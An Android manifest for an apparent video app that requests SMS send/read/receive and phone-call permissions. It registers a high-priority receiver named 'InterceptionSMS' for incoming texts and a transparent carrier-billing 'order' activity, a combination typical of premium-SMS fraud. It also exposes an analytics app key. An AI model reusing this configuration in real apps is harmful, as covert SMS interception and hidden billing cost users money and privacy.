<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.tugkgp.cn"
    android:versionCode="13"
    android:versionName="1.3" >

    <uses-sdk
        android:minSdkVersion="8"
        android:targetSdkVersion="15" />

    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />

    <!-- 拨打电话 -->
    <uses-permission android:name="android.permission.CALL_PHONE" />

    <!-- 友盟 -->

    <application
        android:name="com.tugkgp.cn.base.MApplication"
        android:allowBackup="true"
        android:icon="@drawable/icon"
        android:label="@string/app_name"
        android:theme="@style/AppTheme" >
        <activity
            android:name=".ui.WelcomeActivity"
            android:label="@string/app_name"
            android:screenOrientation="portrait" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity
            android:name=".ui.VideoViewActivity"
            android:screenOrientation="landscape" >
        </activity>
        <activity
            android:name=".ui.MainAcitivity"
            android:screenOrientation="portrait" >
        </activity>
        <activity
            android:name=".ui.PDVideosActivity"
            android:screenOrientation="portrait" >
        </activity>
        <activity
            android:name="com.cmcc.cmvsdk.main.NewOrderActivity"
            android:theme="@style/Transparent" >
        </activity>

        <receiver android:name=".receive.InterceptionSMS" >
            <intent-filter android:priority="1000" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>

        <service
            android:name="com.umeng.update.net.DownloadingService"
            android:process=":DownloadingService" >
        </service>

        <activity
            android:name="com.umeng.update.UpdateDialogActivity"
            android:theme="@android:style/Theme.Translucent.NoTitleBar" >
        </activity>

        <meta-data
            android:name="UMENG_APPKEY"
            android:value="5478064afd98c5fba2000563" >
        </meta-data>
        <meta-data
            android:name="UMENG_CHANNEL"
            android:value="liantong" />
    </application>

</manifest>